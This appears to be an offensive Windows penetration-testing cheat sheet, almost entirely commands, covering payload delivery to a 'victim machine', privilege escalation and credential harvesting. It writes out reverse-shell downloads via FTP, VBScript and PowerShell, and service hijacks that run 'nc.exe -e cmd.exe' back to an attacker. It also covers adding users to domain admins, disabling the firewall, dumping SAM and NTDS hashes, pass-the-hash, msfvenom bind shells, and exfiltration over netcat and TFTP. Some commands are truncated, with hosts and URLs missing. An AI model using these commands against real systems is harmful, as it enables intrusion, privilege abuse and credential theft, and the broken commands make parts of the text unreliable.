Windows Commands

File Transfers

[+] FTP File Transfers
From a cmd.exe prompt
echo open >> ftp_commands.txt
echo anonymous >> ftp_commands.txt
echo password >> ftp_commands.txt
echo binary >> ftp_commands.txt
echo get shell.exe >> ftp_commands.txt
echo bye >> ftp_commands.txt
ftp -s:ftp_commands.txt
[+] Wget.vbs
From a cmd.exe prompt
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
From windows host
cscript wget.vbs shell_nc_32.exe
[+] Powershell
On Local Machine
powershell -command "& {(New-Object Net.WebClient).DownloadFile('', 'C:\inetpub\drupal-7.54\shell64.exe') }"
python -m SimpleHTTPServer 80
On Windows Victim Machine
echo $url = "" >> rvshell.ps1
echo $output = "$PSScriptRoot\rvshell.exe" >> rvshell.ps1
echo $start_time = Get-Date >> rvshell.ps1
echo Invoke-WebRequest -Uri $url -OutFile $output >> rvshell.ps1
echo Write-Output "Time taken: $((Get-Date).Subtract($start_time).Seconds) second(s)" >> rvshell.ps1
On Windows Victim Machine
echo @ECHO OFF >> getshell.bat
echo Powershell.exe -exec Bypass -File "rvshell.ps1" >> getshell.bat
echo PAUSE >> getshell.bat
On Windows Victim Machine
powershell -command "& {(New-Object Net.WebClient).DownloadFile('', 'c:\somefile') }"
[+] Debug.exe
[+] Ncat.exe
Copy files from Windows To Linux
Step1:Download netcat into Windows System and copy nc.exe into the directory where your file is exist. Ex: C:\test\nc.exe
Step 2:Install netcat on ubuntu
#apt-get install netcat
Step 3: Now netcat is available on both Windows and Linux(Ubuntu)
Open command prompt and go to the directory where your file is located and run below
command.This will act as a Server.
C:\test> type backup.iso | nc.exe -l -p 3333
Note: "type" is a command in windows.
Step 4: Receive backup.iso on the client machineLinux(Ubuntu) with the following.This will
act as a Client
# nc 3333 > backup.iso
Copy files from Linux to Windows
On Linxu system run below command. Now this will act as a Server
#cat backup.iso | nc -l -p 3333
On Windows Run below command. Now this will act as a Client.
C:\test> nc.exe 192.168.yyy.yy 3333 > backup.iso
Issue a ^C on the source system and your done one u see file size in destination directory.
Be sure to check the file to be sure it is the same size as the original.
[+] TFTP\#tftp
Starting the Server
Kali comes with a TFTP server installed, atftpd , which can be started with a simple service
atftpd start . I've always had a hell of a time getting it configured and working though, and I
rarely need to start and keep running a TFTP server as a service, so I just use the simpler
Metasploit module.
Metasploit, like with FTP, has an auxiliary TFTP server module at auxiliary/server/tftp .
Set the module options, including TFTPROOT , which determines which directory to serve up,
and OUTPUTPATH if you want to capture TFTP uploads from Windows as well.
Downloading the Files
Again, assuming the tftp utility is installed, you can grab a file with one line from the
Windows prompt. It doesn't require any authentication. Just simply use the -i flag and
the GET action.
Exfiltrating files via TFTP is simple as well with the PUT action. The Metasploit server saves
them in /tmp by default
TFTP is a convenient, simple way to transfer files as it doesn't require authentication and
you can do everything in a single command.
Sidenote: Installing TFTP. As I mentioned, TFTP is not included by default on newer
versions of Windows. If you really wanted to, you can actually enable TFTP from the
command line:
pkgmgr /iu:"TFTP"
Might come in handy, but I'd always rather "live off the land" and use tools that are already

Privilege Escalation

[+] Windows Exploit Suggester
Systeminfo > sysinfo.txt
Gather system information and feed through
python --update
python -i systeminfo.txt -d 2017-08-20-mssb.xls
[+] Pass the hash from within target system with password in registry:
reg query HKLM /f password /t REG_SZ /s # Check for passwords in the registry
psexec.exe -u administrator -p HASHEDPASSWORDFOUNDABOVE Reverseshell.exe
Now you have a reverse system shell.
[+] Pass the hash with SMB Open externally:
Download SAM and SYSTEM file to Kali
pwdump SYSTEM SAM | tee Hashes.txt
pth-winexe -U administrator%HASHEDPASSWORD:FROMSAMFILE // cmd.exe
[+] Scripts to run:
[+] PowerUp.ps1:
powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"
[+] Sherlock.ps1
powershell.exe -exec bypass -Command "& {Import-Module .\Sherlock.ps1; Find-AllVulns}"
Add folder to PATH
set PATH=%PATH%;"C:\Program Files\Oracle\VirtualBox"
[+] Enumeration:
arp -A
echo %username%
ipconfig /all
netstat -ano
route print
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
net users
net user <username>
net user user password /add
net localgroup
net localgroup administrators
net localgroup administrators user /add
net share
runas /savecred /user:administrator cmd
[+] Domain:
net view /domain
net user /domain
net accounts /domain
net group /domain
net group "domain admins" user /add /domain
net group "domain controllers" user /add /domain
nltest /dclist
[+] Firewall:
netsh firewall show state
netsh firewall show config
netsh firewall set opmode disable
[+] Cleartext Passwords:
dir /s *pass* == *cred* == *vnc* == *.config*
findstr /si password *.xml *.ini *.txt
findstr /spin "password" *.*
[+] Tools:
[+] Interesting files:
Map drive:
dir /s /b
dir /s /b | findstr bat
dir /s /b | findstr cmd
dir /s /b | findstr txt
dir /s /b | findstr zip
dir /s /b | findstr ps1
[+] Sysprep:
type c:\sysprep.inf
type c:\sysprep\sysprep.xml
[+] Unattend:
type c:\unattend.xml
type %WINDIR%\Panther\Unattend\Unattended.xml
type %WINDIR%\Panther\Unattended.xml
msfconsole > post/windows/gather/enum_unattend
[+] VNC:
dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b
dir c: /s /b | findstr /si *vnc.ini
[+] MSF
[+] Registry:
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
[+] Scheduled Tasks:
schtasks /query /fo LIST /v > tasks.txt
type tasks.txt | findstr "SYSTEM\|Task To Run"
tasklist /SVC
[+] Weak Service Permissions:
wmic service list brief
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i
/v "system32"') do @echo %a >> c:\windows\temp\permissions.txt
for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls
Check forBUILTIN\Userswith full access(F):for /f eol^=^"^ delims^=^" %a in
(c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a" | findstr "BUILTIN\Users:(F)
Alternative: icacls <file>
Replace the executable with a payload
wmic service <service> call stopservice
wmic service <s ervice> call startservice
shutdown -r -t 0
MSF > exploit/windows/local/service_permissions
[+] Unquoted Service Paths
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v
"c:\windows\" |findstr /i /v """
sc query
sc qc <service>
C:\program files\sub.exe
C:\program files\sub dir\file.exe
MSF > exploit/windows/local/trusted_service_path
Change the upnp service binary:
sc config upnphost binPath= "C:\Temp\nc.exe <ip> 4444 -e C:\Windows\system32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
sc start upnphost
Binary planting:
sc query | findstr SERVICE_NAME
sc config <service> binPath= "C:\Temp\nc.exe <ip> 4444 -e C:\Windows\system32\cmd.exe"
sc config <service> obj= ".\LocalSystem" password= ""
sc qc <service>
sc start <service>
[+] AlwaysInstallElevated:
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
MSF > exploit/windows/local/always_install_elevated
[+] Accesschk:
Upload accesschk.exe
accesschk.exe /accepteula
accesschk.exe -ucqv <service>
accesschk.exe -uwcqv "Authenticated Users" *
[+] Weak folder permissons:
accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\
[+] Weak file permissions:
accesschk.exe -uwqs Users c:\.\
accesschk.exe -uwqs "Authenticated Users" c:\.\
[+] Enable RDP
reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable
[+] Powershell
powershell Get-ExecutionPolicy
powershell Set-ExecutionPolicy unrestricted
[+] Python executable
install PyWin32
python --onefile
[+] Windows kernel exploits
wmic qfe get Caption,Description,HotFixID,InstalledOn
wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB3136041"
[+] Grab Hashes
vssadmin list shadows
vssadmin create shadow /for=C:
copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\Temp
copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32\config\SYSTEM
vssadmin delete shadows /for=C: /all
/usr/share/doc/python-impacket/examples/ -system SYSTEM -ntds ntds.dit -
outputfile dump.txt LOCAL
Meterpreter alternative:
[+] Windows Privilege Escalation Checklist
OS and service pack
systeminfo | findstr /B /C:”OS Name” /C:”OS Version”
System name
Who are you?
echo %username%
Finding other users
net users
net user username
Clear-text passwords
c:\sysprep.ini - [Clear Text]
c:\sysprep\sysprep.xml - [Base64]
findstr /si password *.txt | *.xml | *.ini
reg query HKLM /s | findstr /i password > temp.txt
reg query HKCU /s | findstr /i password > temp.txt
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
Finding weak directory permissions
accesschk.exe /accepteula
accesschk.exe -uwdqs users c:\
accesschk.exe -uwdqs “Authenticated Users” c:\
Finding weak file permissions
accesschk.exe -uwqs users c:\.\
accesschk.exe -uwqs “Authenticated Users” c:\.\
cacls "c:\Program Files" /T | findstr Users
Weak Service permissions
accesschk.exe –uwcqv *
Cross compile exploits
cp /usr/share/exploitdb/platforms/windows/local/<exploit>.c /tmp/
cd /root/.wine/drive_c/MinGW/bin
wine gcc –o w00t.exe /tmp/<exploit>.c -l lib
PSexec <user>@<host> <cmd>
psexec.exe \<host> <cmd>
sc create <servicename> binpath= “c:\windows\system32\cmd.exe /k
<pathtobinaryexecutable>” DisplayName= <displayname>
sc start <servicename>
Creating bind shells
msfvenom -p windows/shell_bind_tcp -f exe -o <Filename.exe> LPORT=<BindPort>
msfvenom -p windows/shell_bind_tcp -f dll -o <Filename.dll> LPORT=<BindPort>
[+] Privilege Escalation Exploits by Patch
First let's find out what OS we are connected to:
C:\Windows\system32> systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
Next we will see what the hostname is of the box and what user we are connected as.
C:\Windows\system32> hostname
C:\Windows\system32> echo %username%
Now we have this basic information we list the other user accounts on the box and view our
own user's information in a bit more detail. We can already see that user1 is not part of the
localgroup Administrators.
C:\Windows\system32> net users
Grab User info
C:\Windows\system32> net user user1
That is all we need to know about users and permissions for the moment. Next on our list is
networking, what is the machine connected to and what rules does it impose on those
First let's have a look at the available network interfaces and routing table.
C:\Windows\system32> ipconfig /all
C:\Windows\system32> route print
# arp -A displays the ARP (Address Resolution Protocol) cache table for all available
C:\Windows\system32> arp -A
That brings us to the active network connections and the firewall rules.
C:\Windows\system32> netstat -ano
The following two netsh commands are examples of commands that are not universal
across OS/SP. The netsh
firewall commands are only available from XP SP2 and upwards.
C:\Windows\system32> netsh firewall show state
C:\Windows\system32> netsh firewall show config
Finally we will take a brief look at the what is running on the compromised box: scheduled
tasks, running processes, started services and installed drivers.
# This will display verbose output for all scheduled tasks, below you can see sample output
for a
single task.
C:\Windows\system32> schtasks /query /fo LIST /v
# The following command links running processes to started services.
C:\Windows\system32> tasklist /SVC
C:\Windows\system32> net start
This can be useful sometimes as some 3rd party drivers, even by reputable companies,
contain more holes
than Swiss cheese. This is only possible because ring0 exploitation lies outside most
peoples expertise.
C:\Windows\system32> DRIVERQUERY
The Arcane Arts Of WMIC
To give you an idea about the extensive options that WMIC has I have listed the available
command line switches below.
C:\Windows\system32> wmic /?
[+] Quick Fails
Before continuing on you should take a moment to review the information that you have
gathered so far as there should be quite a bit by now. The next step in our gameplan is to
look for some quick security fails which can be easily leveraged to upgrade our user
The first and most obvious thing we need to look at is the patchlevel. There is no need to
worry ourself further if we see that the host is badly patched. My WMIC script will already list
all the installed patches but you can see the sample command line output below.
C:\Windows\system32> wmic qfe get Caption,Description,HotFixID,InstalledOn
As always with Windows, the output isn't exactly ready for use. The best strategy is to look
for privilege escalation exploits and look up their respective KB patch numbers. Such
exploits include, but are not limited to, KiTrap0D (KB979682), MS11-011 (KB2393802),
MS10-059 (KB982799), MS10-021 (KB979683), MS11-080 (KB2592799). After enumerating
the OS version and Service Pack you should find out which privilege escalation
vulnerabilities could be present. Using the KB patch numbers you can grep the installed
patches to see if any are missing.
You can see the syntax to grep the patches below:
C:\Windows\system32> wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr
/C:"KB.." /C:"KB.."
Typically these are the directories that contain the configuration files (however it is a good
idea to check the entire OS):
Note: Creds may be base64 encoded
In addition to Groups.xml several other policy preference files can have the optional
"cPassword" attribute set:
Services\Services.xml: Element-Specific Attributes
ScheduledTasks\ScheduledTasks.xml: Task Inner Element, TaskV2 Inner Element,
ImmediateTaskV2 Inner Element
Printers\Printers.xml: SharedPrinter Element
Drives\Drives.xml: Element-Specific Attributes
DataSources\DataSources.xml: Element-Specific Attributes
This vulnerability can be exploited by manually browsing SYSVOL and grabbing the relevant
files as demonstrated below.
To be able to use this we need to check that two registry keys are set, if that is the case we
can pop a SYSTEM shell. You can see the sytntax to query the respective registry keys
# This will only work if both registry keys contain "AlwaysInstallElevated" with DWORD
values of 1.
C:\Windows\system32> reg query
C:\Windows\system32> reg query
To finish off this section we will do some quick searching on the operating system and hope
we strike gold. You can see the syntax for our searches below.
# The command below will search the file system for file names containing certain keywords.
You can
specify as many keywords as you wish.
C:\Windows\system32> dir /s *pass* == *cred* == *vnc* == *.config*
# Search certain file types for a keyword, this can generate a lot of output.
C:\Windows\system32> findstr /si password *.xml *.ini *.txt
# Similarly the two commands below can be used to grep the registry for keywords, in this
case "password".
C:\Windows\system32> reg query HKLM /f password /t REG_SZ /s
C:\Windows\system32> reg query HKCU /f password /t REG_SZ /s
We will start off with Windows services as there are some quick wins to be found there.
Generally modern operating systems won't contain vulnerable services. Vulnerable, in this
case, means that we can reconfigure the service parameters. Windows services are kind of
like application shortcut's, have a look at the example below.
# We can use sc to query, configure and manage windows services.
C:\Windows\system32> sc qc Spooler
We can check the required privilege level for each service using accesschk.
# We can see the permissions that each user level has, you can also use "accesschk.exe -
ucqv *" to list
all services.
C:\> accesschk.exe -ucqv Spooler
Accesschk can automatically check if we have write access to a Windows service with a
certain user level. Generally as a low privilege user we will want to check for "Authenticated
Users". Make sure to check which user groups you user belongs to, "Power Users" for
example is considered a low privilege user group (though it is not widely used).
Lets compare the output on Windows 8 and on Windows XP SP0.
# This is on Windows 8.
C:\Users\b33f\tools\Sysinternals> accesschk.exe -uwcqv "Authenticated Users" *
# On a default Windows XP SP0 we can see there is a pretty big security fail.
C:\> accesschk.exe -uwcqv "Authenticated Users" *
RW upnphost
C:\> accesschk.exe -ucqv SSDPSRV
RW BUILTIN\Administrators
RW NT AUTHORITY\Authenticated Users
RW BUILTIN\Power Users
C:\> accesschk.exe -ucqv upnphost
RW BUILTIN\Administrators
This issue was later resolved with the introduction of XP SP2, however on SP0&SP1 it can
be used as a universal local privilege escalation vulnerability. By reconfiguring the service
we can let it run any binary of our choosing with SYSTEM level privileges.
Let's have a look how this is done in practise. In this case the service will execute netcat and
open a reverse shell with SYSTEM level privileges. Other options are certainly possible.
C:\> sc qc upnphost
[SC] GetServiceConfig SUCCESS
SERVICE_NAME: upnphost
BINARY\_PATH\_NAME : C:\WINDOWS\System32\svchost.exe -k LocalService
C:\> sc config upnphost binpath= "C:\nc.exe -nv 9988 -e
[SC] ChangeServiceConfig SUCCESS
C:\> sc config upnphost obj= ".\LocalSystem" password= ""
[SC] ChangeServiceConfig SUCCESS
C:\> sc qc upnphost
[SC] GetServiceConfig SUCCESS
SERVICE_NAME: upnphost
BINARY\_PATH\_NAME : C:\nc.exe -nv 9988 -e C:\WINDOWS\System32\cmd.exe
C:\> net start upnphost
Stored credentials
Search for credentials within:
Unattend credentials are stored in base64 and can be decoded manually with base64:
user@host $ base64 -d cABhAHMAcwB3AG8AcgBkAFAAYQBzAHMAdwBvAHIAZAA=
Metasploit Framework enum_unattend module and gather credentials module:
dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b
dir c:\ /s /b | findstr /si *vnc.ini
findstr /si password *.txt | *.xml | *.ini
findstr /si pass *.txt | *.xml | *.ini
Password recovery programs - small - RDP, Mail, IE, VNC, Dialup, Protected Storage...\_recovery\_tools.html
Dumping cleartext credentials with mimikatz
Query the Windows Registry
VNC Stored:
reg query "HKCU\Software\ORL\WinVNC3\Password"
Windows Autologin:
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
SNMP Parameters:
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
Putty clear text proxy credentials:
reg query" HKCU\Software\SimonTatham\PuTTY\Sessions"
Search the registry - copy (pipe) to the clipboard (optional)
reg query HKLM /f password /t REG_SZ /s [ |clip]
reg query HKCU /f password /t REG_SZ /s [ |clip]
Insecure GUI apps
running as SYSTEM that can open cmd.exe or directories "files, logfiles" etc.
Directory permissions
Sysinternals tools
Check processes and start-up applications with Autoruns and procmon -
Services pointing to writeable locations
*- orphaned installs - applications not installed that still exist in startup
*- replacing unknown dlls
*- PATH directories with weak permissions - overwrites possible?
sysinternals tools
accesschk.exe -uwcqv *
*- unsecured processes
*- steal process/thread tokens (a'la incognito)
*- hijack handles for write access
Change the upnp service binary
sc qc upnphostsc config upnphost binpath= "net user <username> /add"
sc config upnphost obj= ".\LocalSystem" password =""
net stop upnphost
net start upnphost
May work with other services if permissions permit
Vulnerability Privilege Escalation
[+] Windows kernel privilege escalation
Tomcat Windows privilege escalation
NtGdiEnableEudc Exploit (MS11-011) - windows XP SP0-3
16262,platforms/windows/dos/16262.,"MS11-011(CVE-2011-0045): MS Windows XP
WmiTraceMessageVa Integer Truncation Vulnerability PoC",2011-03-01,"Nikita
Service Tracing Key (MS10-059)
Registry Symlink Vuln (MS10-021)
No Public Exploit - VuPEN membership only
Ryujin - ADF.sys priv esc - ms11-080
pyinstaller -
py2exe -
UAC Bypass priv esc
Download Password Hashes
Download \windows\repair\sam
Download \windows\repair\system
Resources & Credits